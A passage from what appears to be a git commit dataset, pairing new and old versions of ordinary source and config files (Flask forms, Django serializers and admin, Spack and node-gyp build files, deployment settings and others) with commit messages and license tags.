Copyright 2017, Institute for Systems Biology.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: michael
'''
from google.cloud import bigquery
def query_bq_table(query, use_legacy, project, log):
log.info('\t\tquerying bq: %s' % query)
client = bigquery.Client(project=project)
query_results = client.run_sync_query(query)
# Use standard SQL syntax for queries.
# See: https://cloud.google.com/bigquery/sql-reference/
query_results.use_legacy_sql = use_legacy
query_results.run()
log.info('\t\tdone querying bq: %s' % query)
return query_results
def fetch_paged_results(query_results, fetch_count, project_name, page_token, log):
log.info('\t\trequesting %d rows %s' % (fetch_count, (' for ' + project_name) if project_name else ''))
rows, total_rows, page_token = query_results.fetch_data(
max_results=fetch_count,
page_token=page_token)
log.info('\t\tfetched %d rows %s' % (len(rows), (' for ' + project_name) if project_name else ''))
return total_rows, rows, page_token
| apache-2.0 | Python |
d590307b0d59ac7163016197e3de0e8bced377d2 | Fix form typo | TwilioDevEd/account-verification-flask,TwilioDevEd/account-verification-flask,TwilioDevEd/account-verification-flask | account_verification_flask/forms/forms.py | account_verification_flask/forms/forms.py | from flask_wtf import Form
from wtforms import TextField, PasswordField, IntegerField
from wtforms.validators import DataRequired, Length, Email, EqualTo
class RegisterForm(Form):
name = TextField(
'Tell us your name',
validators = [DataRequired(message = "Name is required"), Length(min = 3,message = "Name must greater than 3 chars")]
)
email = TextField(
'Enter your E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
password = PasswordField(
'Password',
validators = [DataRequired("Password is required")]
)
country_code = TextField(
'Country Code',
validators = [DataRequired("Country code is required"), Length(min = 1, max = 4, message = "Country must be between 1 and 4 chars")]
)
phone_number = IntegerField(
'Phone Number',
validators = [DataRequired("Valid phone number is required")]
)
class ResendCodeForm(Form):
email = TextField(
'E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
class VerifyCodeForm(ResendCodeForm):
verification_code = TextField(
'Verification Code',
validators = [DataRequired("Verification code is required")]
)
| from flask_wtf import Form
from wtforms import TextField, PasswordField, IntegerField
from wtforms.validators import DataRequired, Length, Email, EqualTo
class RegisterForm(Form):
name = TextField(
'Tell us your name',
validators = [DataRequired(message = "Name is required"), Length(min = 3,message = "Name must greater than 3 chars")]
)
email = TextField(
'Enter your E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
password = PasswordField(
'Password',
validators = [DataRequired("Password is required")]
)
country_code = TextField(
'Coundtry Code',
validators = [DataRequired("Country code is required"), Length(min = 1, max = 4, message = "Country must be between 1 and 4 chars")]
)
phone_number = IntegerField(
'Phone Number',
validators = [DataRequired("Valid phone number is required")]
)
class ResendCodeForm(Form):
email = TextField(
'E-mail',
validators = [DataRequired("E-mail is required"), Email(message = "Invalid E-mail address")]
)
class VerifyCodeForm(ResendCodeForm):
verification_code = TextField(
'Verification Code',
validators = [DataRequired("Verification code is required")]
)
| mit | Python |
7998477a627a78b83f96894e72ec2f121c4b9606 | Update binding.gyp | jeremycx/node-LDAP,jeremycx/node-LDAP,jeremycx/node-LDAP,jeremycx/node-LDAP | binding.gyp | binding.gyp | {
"targets": [
{
'target_name': 'LDAP',
'sources': [
'src/LDAP.cc'
],
'include_dirs': [
'/usr/local/include'
],
'defines': [
'LDAP_DEPRECATED'
],
'cflags': [
'-Wall',
'-g'
],
'libraries': [
'-llber -lldap'
],
'ldflags': [
'-L/usr/local/lib'
],
'conditions': [
['OS=="linux"', {
'ldflags': [
'-luuid'
]
}
],
['OS=="mac"', {
"link_settings": {
"libraries": [
"-lldap"
]
}
}
]
]
}
]
}
| {
"targets": [
{
'target_name': 'LDAP',
'sources': [
'src/LDAP.cc'
],
'include_dirs': [
'/usr/local/include'
],
'defines': [
'LDAP_DEPRECATED'
],
'cflags': [
'-Wall',
'-g'
],
'ldflags': [
'-L/usr/local/lib',
'-lldap'
],
'conditions': [
['OS=="linux"', {
'ldflags': [
'-luuid'
]
}
],
['OS=="mac"', {
"link_settings": {
"libraries": [
"-lldap"
]
}
}
]
]
}
]
}
| mit | Python |
2a65b1715e469e11ed73faf7f3446f81c836c42e | Add fetch domain logic | kkstu/DNStack,kkstu/DNStack,kkstu/DNStack | handler/domain.py | handler/domain.py | #!/usr/bin/python
# -*- coding:utf-8 -*-
# Powered By KK Studio
# Domain Page
from BaseHandler import BaseHandler
from tornado.web import authenticated as Auth
from model.models import Domain, Groups, Record
class IndexHandler(BaseHandler):
@Auth
def get(self):
page = int(self.get_argument('page', 1))
line = int(self.get_argument('line', 20))
offset = (page - 1) * line
data = self.db.query(Domain).offset(offset).limit(line).all()
self.render('domain/index.html',data=data)
class GroupHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/group.html')
class RecordHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/record.html')
| #!/usr/bin/python
# -*- coding:utf-8 -*-
# Powered By KK Studio
# Domain Page
from BaseHandler import BaseHandler
from tornado.web import authenticated as Auth
class IndexHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/index.html')
class GroupHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/group.html')
class RecordHandler(BaseHandler):
@Auth
def get(self):
self.render('domain/record.html')
| mit | Python |
c7412824c1e9edb7c386f111ce30b5d76952f861 | Remove 'reviews' from Context API return | Architizer/mendel,Architizer/mendel,Architizer/mendel,Architizer/mendel | mendel/serializers.py | mendel/serializers.py | from .models import Keyword, Category, Document, Context, Review, User
from rest_auth.models import TokenModel
from rest_framework import serializers
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
fields = ('id', 'name', 'definition')
def create(self, validated_data):
instance, _ = Keyword.objects.get_or_create(**validated_data)
return instance
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = ('id', 'name', 'description')
class ContextSerializer(serializers.ModelSerializer):
keyword_given = KeywordSerializer()
user_reviews = serializers.SerializerMethodField('get_reviews')
def get_reviews(self, obj):
results = Review.objects.filter(user=self.context['request'].user)
return ReviewSerializer(results, many=True).data
class Meta:
model = Context
fields = ('id', 'position_from', 'position_to', 'text', 'document', 'keyword_given', 'next_context_id', 'prev_context_id', 'user_reviews')
depth = 1
class DocumentSerializer(serializers.ModelSerializer):
class Meta:
model = Document
fields = ('__all__')
class ReviewSerializer(serializers.ModelSerializer):
class Meta:
model = Review
fields = ('__all__')
class UserSerializer(serializers.ModelSerializer):
last_context_id = serializers.SerializerMethodField('return_last_context_id')
def return_last_context_id(self, user):
try:
return Review.objects.filter(user=user.id).latest('created').context.id
except:
return Context.objects.first().id if Context.objects.first() else None
class Meta:
model = User
fields = ('id', 'username', 'is_staff', 'last_context_id')
class TokenSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = TokenModel
fields = ('key','user',)
depth = 1
| from .models import Keyword, Category, Document, Context, Review, User
from rest_auth.models import TokenModel
from rest_framework import serializers
class KeywordSerializer(serializers.ModelSerializer):
class Meta:
model = Keyword
fields = ('id', 'name', 'definition')
def create(self, validated_data):
instance, _ = Keyword.objects.get_or_create(**validated_data)
return instance
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = ('id', 'name', 'description')
class ContextSerializer(serializers.ModelSerializer):
keyword_given = KeywordSerializer()
user_reviews = serializers.SerializerMethodField('get_reviews')
def get_reviews(self, obj):
results = Review.objects.filter(user=self.context['request'].user)
return ReviewSerializer(results, many=True).data
class Meta:
model = Context
fields = ('id', 'position_from', 'position_to', 'text', 'document', 'keyword_given', 'next_context_id', 'prev_context_id', 'reviews', 'user_reviews')
depth = 1
class DocumentSerializer(serializers.ModelSerializer):
class Meta:
model = Document
fields = ('__all__')
class ReviewSerializer(serializers.ModelSerializer):
class Meta:
model = Review
fields = ('__all__')
class UserSerializer(serializers.ModelSerializer):
last_context_id = serializers.SerializerMethodField('return_last_context_id')
def return_last_context_id(self, user):
try:
return Review.objects.filter(user=user.id).latest('created').context.id
except:
return Context.objects.first().id if Context.objects.first() else None
class Meta:
model = User
fields = ('id', 'username', 'is_staff', 'last_context_id')
class TokenSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = TokenModel
fields = ('key','user',)
depth = 1
| agpl-3.0 | Python |
f471441bde9940e46badd0ec506c18e8587de004 | Optimize the rebuild admin | SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci,SalesforceFoundation/mrbelvedereci | metaci/build/admin.py | metaci/build/admin.py | from django.contrib import admin
from metaci.build.models import Build
from metaci.build.models import BuildFlow
from metaci.build.models import FlowTask
from metaci.build.models import Rebuild
class BuildAdmin(admin.ModelAdmin):
list_display = (
'repo',
'plan',
'branch',
'commit',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('repo', 'plan')
list_select_related = ('branch','repo','plan')
raw_id_fields = ('branch', 'plan', 'repo', 'org', 'org_instance', 'current_rebuild')
admin.site.register(Build, BuildAdmin)
class BuildFlowAdmin(admin.ModelAdmin):
list_display = (
'build',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build')
admin.site.register(BuildFlow, BuildFlowAdmin)
class FlowTaskAdmin(admin.ModelAdmin):
list_display = ('id', 'build_flow', 'stepnum', 'path', 'status')
list_filter = ('build_flow__build__repo',)
raw_id_fields = ['build_flow']
admin.site.register(FlowTask, FlowTaskAdmin)
class RebuildAdmin(admin.ModelAdmin):
list_display = (
'build',
'user',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build__plan')
raw_id_fields = ('build', 'org_instance')
admin.site.register(Rebuild, RebuildAdmin)
| from django.contrib import admin
from metaci.build.models import Build
from metaci.build.models import BuildFlow
from metaci.build.models import FlowTask
from metaci.build.models import Rebuild
class BuildAdmin(admin.ModelAdmin):
list_display = (
'repo',
'plan',
'branch',
'commit',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('repo', 'plan')
list_select_related = ('branch','repo','plan')
raw_id_fields = ('branch', 'plan', 'repo', 'org', 'org_instance', 'current_rebuild')
admin.site.register(Build, BuildAdmin)
class BuildFlowAdmin(admin.ModelAdmin):
list_display = (
'build',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build')
admin.site.register(BuildFlow, BuildFlowAdmin)
class FlowTaskAdmin(admin.ModelAdmin):
list_display = ('id', 'build_flow', 'stepnum', 'path', 'status')
list_filter = ('build_flow__build__repo',)
raw_id_fields = ['build_flow']
admin.site.register(FlowTask, FlowTaskAdmin)
class RebuildAdmin(admin.ModelAdmin):
list_display = (
'build',
'user',
'status',
'time_queue',
'time_start',
'time_end',
)
list_filter = ('build__repo', 'build')
admin.site.register(Rebuild, RebuildAdmin)
| bsd-3-clause | Python |
206f76026504219ed52f2fcca1b6b64b78bdcf21 | Add some print statements | SOMCA/hot-pepper,SOMCA/hot-pepper,SOMCA/hot-pepper,SOMCA/hot-pepper,SOMCA/hot-pepper | software/lightpowertool/csv_export.py | software/lightpowertool/csv_export.py | import csv
class CSVExport(object):
"""docstring for CSVExport"""
def __init__(self, filename):
super(CSVExport, self).__init__()
self._filename = filename
def export_data(self, data):
print("Beginning exportation of data...")
with open(self._filename, "w", newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',')
for single_data in data:
csvwriter.writerow(list(single_data))
print("Exportation has been done!")
| import csv
class CSVExport(object):
"""docstring for CSVExport"""
def __init__(self, filename):
super(CSVExport, self).__init__()
self._filename = filename
def export_data(self, data):
with open(self._filename, "w", newline='') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',')
for single_data in data:
csvwriter.writerow(list(single_data))
| agpl-3.0 | Python |
3121a02c6174a31b64974d57a3ec2d7df760a7ae | Ajoute une référence législative au taux d'incapacité | sgmap/openfisca-france,sgmap/openfisca-france | openfisca_france/model/caracteristiques_socio_demographiques/capacite_travail.py | openfisca_france/model/caracteristiques_socio_demographiques/capacite_travail.py | # -*- coding: utf-8 -*-
from openfisca_france.model.base import *
class taux_capacite_travail(Variable):
value_type = float
default_value = 1.0
entity = Individu
label = u"Taux de capacité de travail, appréciée par la commission des droits et de l'autonomie des personnes handicapées (CDAPH)"
definition_period = MONTH
class taux_incapacite(Variable):
value_type = float
entity = Individu
label = u"Taux d'incapacité"
definition_period = MONTH
reference = "https://www.legifrance.gouv.fr/affichCodeArticle.do;jsessionid=BD54F4B28313142C87FC8B96013E0441.tplgfr44s_1?idArticle=LEGIARTI000023097719&cidTexte=LEGITEXT000006073189&dateTexte=20190312"
documentation = "Taux d'incapacité retenu pour l'Allocation Adulte Handicapé (AAH)."
| # -*- coding: utf-8 -*-
from openfisca_france.model.base import *
class taux_capacite_travail(Variable):
value_type = float
default_value = 1.0
entity = Individu
label = u"Taux de capacité de travail, appréciée par la commission des droits et de l'autonomie des personnes handicapées (CDAPH)"
definition_period = MONTH
class taux_incapacite(Variable):
value_type = float
entity = Individu
label = u"Taux d'incapacité"
definition_period = MONTH
| agpl-3.0 | Python |
a279cb4340c6da5ed64b39660cfcb5ef53d0bb74 | Fix test | cjellick/rancher,rancher/rancher,rancher/rancher,cjellick/rancher,rancherio/rancher,rancher/rancher,rancherio/rancher,cjellick/rancher,rancher/rancher | tests/core/test_node.py | tests/core/test_node.py | from common import auth_check
def test_node_fields(mc):
cclient = mc.client
fields = {
'nodeTaints': 'r',
'nodeLabels': 'r',
'nodeAnnotations': 'r',
'namespaceId': 'cr',
'conditions': 'r',
'allocatable': 'r',
'capacity': 'r',
'hostname': 'r',
'info': 'r',
'ipAddress': 'r',
'limits': 'r',
'nodePoolUuid': 'r',
'nodeName': 'r',
'requested': 'r',
'clusterId': 'cr',
'etcd': 'cr',
'controlPlane': 'cr',
'worker': 'cr',
'requestedHostname': 'cr',
'volumesAttached': 'r',
'nodeTemplateId': 'cr',
'volumesInUse': 'r',
'podCidr': 'r',
'name': 'cru',
'taints': 'ru',
'unschedulable': 'ru',
'providerId': 'r',
'sshUser': 'r',
'imported': "cru",
}
for name, field in cclient.schema.types['node'].resourceFields.items():
if name.endswith("Config"):
fields[name] = 'cr'
fields['customConfig'] = 'cru'
auth_check(cclient.schema, 'node', 'crud', fields)
| from common import auth_check
def test_node_fields(mc):
cclient = mc.client
fields = {
'nodeTaints': 'r',
'nodeLabels': 'r',
'nodeAnnotations': 'r',
'namespaceId': 'cr',
'conditions': 'r',
'allocatable': 'r',
'capacity': 'r',
'hostname': 'r',
'info': 'r',
'ipAddress': 'r',
'limits': 'r',
'nodePoolUuid': 'r',
'nodeName': 'r',
'requested': 'r',
'clusterId': 'cr',
'etcd': 'cru',
'controlPlane': 'cru',
'worker': 'cru',
'requestedHostname': 'cr',
'volumesAttached': 'r',
'nodeTemplateId': 'cr',
'volumesInUse': 'r',
'podCidr': 'r',
'name': 'cru',
'taints': 'ru',
'unschedulable': 'ru',
'providerId': 'r',
'sshUser': 'r',
'imported': "cru",
}
for name, field in cclient.schema.types['node'].resourceFields.items():
if name.endswith("Config"):
fields[name] = 'cr'
fields['customConfig'] = 'cru'
auth_check(cclient.schema, 'node', 'crud', fields)
| apache-2.0 | Python |
1bf3e893e45e0dc16e2e820f5f073a63600217c3 | Fix errors in PeriodicFilter | Twinters007/robotpy-wpilib-utilities,robotpy/robotpy-wpilib-utilities,Twinters007/robotpy-wpilib-utilities,robotpy/robotpy-wpilib-utilities | robotpy_ext/misc/periodic_filter.py | robotpy_ext/misc/periodic_filter.py | import logging
import time
class PeriodicFilter:
"""
Periodic Filter to help keep down clutter in the console.
Simply add this filter to your logger and the logger will
only print periodically.
The logger will always print logging levels of WARNING or higher
"""
def __init__(self, period, bypassLevel=logging.WARN):
'''
:param period: Wait period (in seconds) between logs
:param bypassLevel: Lowest logging level that the filter should ignore
'''
self._period = period
self._loggingLoop = True
self._last_log = -period
self._bypassLevel = bypassLevel
def filter(self, record):
"""Performs filtering action for logger"""
self._refresh_logger()
return self._loggingLoop or record.levelno >= self._bypassLevel
def _refresh_logger(self):
"""Determine if the log wait period has passed"""
now = time.monotonic()
self._loggingLoop = False
if now - self._last_log > self._period:
self._loggingLoop = True
self._last_log = now
| import logging
import wpilib
class PeriodicFilter:
"""
Periodic Filter to help keep down clutter in the console.
Simply add this filter to your logger and the logger will
only print periodically.
The logger will always print logging levels of WARNING or higher
"""
def __init__(self, period, bypassLevel=logging.WARN):
'''
:param period: Wait period (in seconds) between logs
:param bypassLevel: Lowest logging level that the filter should ignore
'''
self.period = period
self.loggingLoop = True
self._last_log = -period
self.bypassLevel = bypassLevel
def filter(self, record):
"""Performs filtering action for logger"""
self._refresh_logger()
return self.parent.loggingLoop or record.levelno >= self.bypassLevel
def _refresh_logger(self):
"""Determine if the log wait period has passed"""
now = wpilib.Timer.getFPGATimestamp()
self.loggingLoop = False
if now - self.__last_log > self.logging_interval:
self.loggingLoop = True
self.__last_log = now
| bsd-3-clause | Python |
881b5c56e89fb2fdb7d4af3a9ec5c5044a25b878 | declare dummy functions | gautamdivgi/eris,LCOO/eris | ansible/lib/modules/rally/library/test.py | ansible/lib/modules/rally/library/test.py | from ansible.module_utils.basic import *
DOCUMENTATION = '''
---
module: rally
short_description: Executes rally commands
'''
def main():
fields = {
"scenario_file" : {"required": True, "type": "str"},
"scenario_args" : {"required" : False, "type": "str"},
}
commands = {'create_db', 'create_deployment', 'check_deployment', 'start_task' , 'task_report' }
module = AnsibleModule(argument_spec={})
response = {"hello": "world"}
module.exit_json(changed=False, meta=response)
def create_db():
pass
def create_deployment():
pass
def check_deployment():
pass
def start_task():
pass
def task_report():
pass
if __name__ == '__main__':
# CALL Rally loader
# TODO
main()
| from ansible.module_utils.basic import *
DOCUMENTATION = '''
---
module: rally
short_description: Executes rally commands
'''
def main():
fields = {
"scenario_file" : {"required": True, "type": "str"},
"scenario_args" : {"required" : False, "type": "str"},
}
commands = {'create_db', 'create_deployment', 'check_deployment', 'start_task' }
module = AnsibleModule(argument_spec={})
response = {"hello": "world"}
module.exit_json(changed=False, meta=response)
if __name__ == '__main__':
main()
| apache-2.0 | Python |
27330e69226f36b49f5d5eca5a67af29ee8d679b | Normalize the weasyl link. | Weasyl/conbadger | conbadge.py | conbadge.py | from fractions import Fraction
from cStringIO import StringIO
from PIL import Image, ImageDraw, ImageFont
import qrcode
import requests
museo = ImageFont.truetype('Museo500-Regular.otf', 424)
badge_back = Image.open('badge-back.png')
logo_stamp = Image.open('logo-stamp.png')
qr_size = 975, 975
qr_offset = 75, 75
name_color = 6, 155, 192
text_bounds = 735, 125
text_offset = 365, 1155
avatar_bounds = 282, 282
avatar_offset = 49, 1131
class AvatarFetchError(Exception):
pass
def draw_text(text, color, fit_size):
text_size = museo.getsize(text)
img = Image.new('RGBA', text_size, color + (0,))
draw = ImageDraw.Draw(img)
draw.text((0, 0), text, color + (255,), font=museo)
width, height = img.size
fit_width, fit_height = fit_size
width_ratio = Fraction(width, fit_width)
height_ratio = Fraction(height, fit_height)
if width_ratio > height_ratio:
new_size = fit_width, int(height / width_ratio)
else:
new_size = int(width / height_ratio), fit_height
return img.resize(new_size, Image.ANTIALIAS)
def center(size, fit_size, offset):
w, h = size
fw, fh = fit_size
x, y = offset
return x + (fw - w) // 2, y + (fh - h) // 2
logo_pos = center(logo_stamp.size, qr_size, qr_offset)
def weasyl_sysname(target):
return ''.join(i for i in target if i.isalnum()).lower()
def weasyl_badge(username, avatar_resizing=Image.ANTIALIAS):
r = requests.get(
'https://www.weasyl.com/api/useravatar', params={'username': username})
resp = r.json()
if resp['error']['code'] != 0:
raise AvatarFetchError(resp['error'])
back = badge_back.copy()
qr = qrcode.QRCode(
error_correction=qrcode.constants.ERROR_CORRECT_H, border=1)
qr.add_data('https://weasyl.com/~%s' % (weasyl_sysname(username),))
qr_mask = qr.make_image().resize(qr_size)
back.paste((255, 255, 255, 255), qr_offset, qr_mask)
back.paste(logo_stamp, logo_pos, logo_stamp)
text = draw_text(username, name_color, text_bounds)
text_pos = center(text.size, text_bounds, text_offset)
back.paste(text, text_pos, text)
avatar = Image.open(StringIO(requests.get(resp['avatar']).content))
avatar = avatar.resize(avatar_bounds, avatar_resizing).convert('RGBA')
back.paste(avatar, avatar_offset, avatar)
return back
| from fractions import Fraction
from cStringIO import StringIO
from PIL import Image, ImageDraw, ImageFont
import qrcode
import requests
museo = ImageFont.truetype('Museo500-Regular.otf', 424)
badge_back = Image.open('badge-back.png')
logo_stamp = Image.open('logo-stamp.png')
qr_size = 975, 975
qr_offset = 75, 75
name_color = 6, 155, 192
text_bounds = 735, 125
text_offset = 365, 1155
avatar_bounds = 282, 282
avatar_offset = 49, 1131
class AvatarFetchError(Exception):
pass
def draw_text(text, color, fit_size):
text_size = museo.getsize(text)
img = Image.new('RGBA', text_size, color + (0,))
draw = ImageDraw.Draw(img)
draw.text((0, 0), text, color + (255,), font=museo)
width, height = img.size
fit_width, fit_height = fit_size
width_ratio = Fraction(width, fit_width)
height_ratio = Fraction(height, fit_height)
if width_ratio > height_ratio:
new_size = fit_width, int(height / width_ratio)
else:
new_size = int(width / height_ratio), fit_height
return img.resize(new_size, Image.ANTIALIAS)
def center(size, fit_size, offset):
w, h = size
fw, fh = fit_size
x, y = offset
return x + (fw - w) // 2, y + (fh - h) // 2
logo_pos = center(logo_stamp.size, qr_size, qr_offset)
def weasyl_badge(username, avatar_resizing=Image.ANTIALIAS):
r = requests.get(
'https://www.weasyl.com/api/useravatar', params={'username': username})
resp = r.json()
if resp['error']['code'] != 0:
raise AvatarFetchError(resp['error'])
back = badge_back.copy()
qr = qrcode.QRCode(
error_correction=qrcode.constants.ERROR_CORRECT_H, border=1)
qr.add_data('https://weasyl.com/~%s' % (username,))
qr_mask = qr.make_image().resize(qr_size)
back.paste((255, 255, 255, 255), qr_offset, qr_mask)
back.paste(logo_stamp, logo_pos, logo_stamp)
text = draw_text(username, name_color, text_bounds)
text_pos = center(text.size, text_bounds, text_offset)
back.paste(text, text_pos, text)
avatar = Image.open(StringIO(requests.get(resp['avatar']).content))
avatar = avatar.resize(avatar_bounds, avatar_resizing).convert('RGBA')
back.paste(avatar, avatar_offset, avatar)
return back
| isc | Python |
90678692ec85ec90d454b1a3b255dae834bb24ba | trim space | klen/peewee_migrate | tests/mocks/postgres.py | tests/mocks/postgres.py | from psycopg2.extensions import connection, cursor
class MockConnection(connection):
def __init__(self, *args, **kwargs):
self._cursor = MockCursor()
def cursor(self, *args, **kwargs):
return self._cursor
class MockCursor(cursor):
def __init__(self, *args, **kwargs):
self.queries = []
def execute(self, query, *args, **kwargs):
self.queries.append(query)
def fetchall(self, *args, **kwargs):
return []
def fetchone(self, *args, **kwargs):
return None
__all__ = ["MockConnection"] |
from psycopg2.extensions import connection, cursor
class MockConnection(connection):
def __init__(self, *args, **kwargs):
self._cursor = MockCursor()
def cursor(self, *args, **kwargs):
return self._cursor
class MockCursor(cursor):
def __init__(self, *args, **kwargs):
self.queries = []
def execute(self, query, *args, **kwargs):
self.queries.append(query)
def fetchall(self, *args, **kwargs):
return []
def fetchone(self, *args, **kwargs):
return None
__all__ = ["MockConnection"] | bsd-3-clause | Python |
4c5ebbabcf54b1f23459da7ddf85adf5e5de22d8 | Update add-lore.py to serve legacy lorebot needs | christhompson/loredb | add-lore.py | add-lore.py | #!/usr/bin/env python3
import argparse
import datetime
from peewee import peewee
db = peewee.SqliteDatabase(None)
class BaseModel(peewee.Model):
class Meta:
database = db
class Lore(BaseModel):
time = peewee.DateTimeField(null=True, index=True)
author = peewee.CharField(null=True, index=True)
lore = peewee.CharField()
rating = peewee.FloatField()
def __str__(self):
return "[%s] [%s]\n%s" % (self.time, self.author, self.lore)
def main():
lore_file = 'lore.db'
db.init(lore_file)
parser = argparse.ArgumentParser()
parser.add_argument('lore', nargs='+', help="blob of lore to save")
args = parser.parse_args()
lore = ' '.join(args.lore)
# add-lore "[mike_bloomfield]: how do i use the lorebot "
t = datetime.datetime.now()
# Try to parse plain loreblob, extracting author from []
author = lore.split(': ')[0].split('[')[1].split(']')[0]
loretxt = ': '.join(lore.split(': ')[1:])
db.begin()
# Check to see if lore already exists (based on author/lore match)
matches = Lore.select().where(Lore.author == author and Lore.lore == lore).count()
if matches == 0:
l = Lore.create(time=t, author=author, lore=loretxt, rating=0)
print(l)
else:
print("Lore already exists...")
db.commit()
if __name__ == "__main__":
main()
| #!/usr/bin/env python3
import argparse
import datetime
from peewee import peewee
db = peewee.SqliteDatabase(None)
class BaseModel(peewee.Model):
class Meta:
database = db
class Lore(BaseModel):
time = peewee.DateTimeField(null=True, index=True)
author = peewee.CharField(null=True, index=True)
lore = peewee.CharField()
rating = peewee.FloatField()
def main():
lore_file = 'lore.db'
db.init(lore_file)
parser = argparse.ArgumentParser()
parser.add_argument('author')
parser.add_argument('lore', nargs='+', help="blob of lore to save")
args = parser.parse_args()
print(args.lore)
t = datetime.datetime.now()
# Try to parse plain loreblob, extracting author from []
author = args.author
lore = ' '.join(args.lore)
print(author, lore)
db.begin()
# Check to see if lore already exists (based on author/lore match)
matches = Lore.select().where(Lore.author == author and Lore.lore == lore).count()
if matches == 0:
Lore.create(time=t, author=author, lore=lore, rating=0)
db.commit()
if __name__ == "__main__":
main()
| apache-2.0 | Python |
6ed282bb2da04790e6e399faad4d2ba8dfc214c4 | add v0.20210330 (#28111) | LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack,LLNL/spack | var/spack/repos/builtin/packages/ccls/package.py | var/spack/repos/builtin/packages/ccls/package.py | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Ccls(CMakePackage):
"""C/C++ language server"""
homepage = "https://github.com/MaskRay/ccls"
git = "https://github.com/MaskRay/ccls.git"
url = "https://github.com/MaskRay/ccls/archive/0.20201025.tar.gz"
maintainers = ['jacobmerson']
version('0.20210330', sha256='28c228f49dfc0f23cb5d581b7de35792648f32c39f4ca35f68ff8c9cb5ce56c2')
version('0.20201025', sha256='1470797b2c1a466e2d8a069efd807aac6fefdef8a556e1edf2d44f370c949221')
variant('build_type', default='Release', description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on("[email protected]:", type="build")
depends_on('llvm@7:')
depends_on('rapidjson')
| # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Ccls(CMakePackage):
"""C/C++ language server"""
homepage = "https://github.com/MaskRay/ccls"
git = "https://github.com/MaskRay/ccls.git"
url = "https://github.com/MaskRay/ccls/archive/0.20201025.tar.gz"
maintainers = ['jacobmerson']
version('0.20201025', sha256='1470797b2c1a466e2d8a069efd807aac6fefdef8a556e1edf2d44f370c949221')
variant('build_type', default='Release', description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on("[email protected]:", type="build")
depends_on('llvm@7:')
depends_on('rapidjson')
| lgpl-2.1 | Python |
f230e69780823f4ceb48a68015cd5bd4af94cba0 | Add in some settings for email | pombredanne/discern,pombredanne/discern,pombredanne/discern,pombredanne/discern | ml_service_api/aws.py | ml_service_api/aws.py | """
Deployment settings file
"""
from settings import *
import json
DEBUG=False
TIME_BETWEEN_INDEX_REBUILDS = 60 * 30 # seconds
#Tastypie throttle settings
THROTTLE_AT = 100 #Throttle requests after this number in below timeframe
THROTTLE_TIMEFRAME= 60 * 60 #Timeframe in which to throttle N requests, seconds
THROTTLE_EXPIRATION= 24 * 60 * 60 # When to remove throttle entries from cache, seconds
with open(os.path.join(ENV_ROOT,"env.json")) as env_file:
ENV_TOKENS = json.load(env_file)
with open(os.path.join(ENV_ROOT, "auth.json")) as auth_file:
AUTH_TOKENS = json.load(auth_file)
DATABASES = AUTH_TOKENS.get('DATABASES', DATABASES)
CACHES = AUTH_TOKENS.get('CACHES', CACHES)
AWS_ACCESS_KEY_ID = AUTH_TOKENS.get('AWS_ACCESS_KEY_ID', AWS_ACCESS_KEY_ID)
AWS_SECRET_ACCESS_KEY = AUTH_TOKENS.get('AWS_SECRET_ACCESS_KEY', AWS_SECRET_ACCESS_KEY)
USE_S3_TO_STORE_MODELS = ENV_TOKENS.get('USE_S3_TO_STORE_MODELS', USE_S3_TO_STORE_MODELS)
S3_BUCKETNAME = ENV_TOKENS.get('S3_BUCKETNAME', S3_BUCKETNAME)
BROKER_URL = AUTH_TOKENS.get('BROKER_URL', BROKER_URL)
CELERY_RESULT_BACKEND = AUTH_TOKENS.get('CELERY_RESULT_BACKEND', CELERY_RESULT_BACKEND)
ELB_HOSTNAME = ENV_TOKENS.get('ELB_HOSTNAME', None)
EMAIL_BACKEND = ENV_TOKENS.get('EMAIL_BACKEND', EMAIL_BACKEND)
AWS_SES_REGION_NAME = ENV_TOKENS.get('AWS_SES_REGION_NAME', None)
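# SES endpoints are region-scoped, so build the hostname from the configured region.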
if AWS_SES_REGION_NAME is not None:
AWS_SES_REGION_ENDPOINT = 'email.{0}.amazonaws.com'.format(AWS_SES_REGION_NAME)
if ELB_HOSTNAME is not None:
ALLOWED_HOSTS += [ELB_HOSTNAME] | """
Deployment settings file
"""
from settings import *
import json
DEBUG=False
TIME_BETWEEN_INDEX_REBUILDS = 60 * 30 # seconds
#Tastypie throttle settings
THROTTLE_AT = 100 #Throttle requests after this number in below timeframe
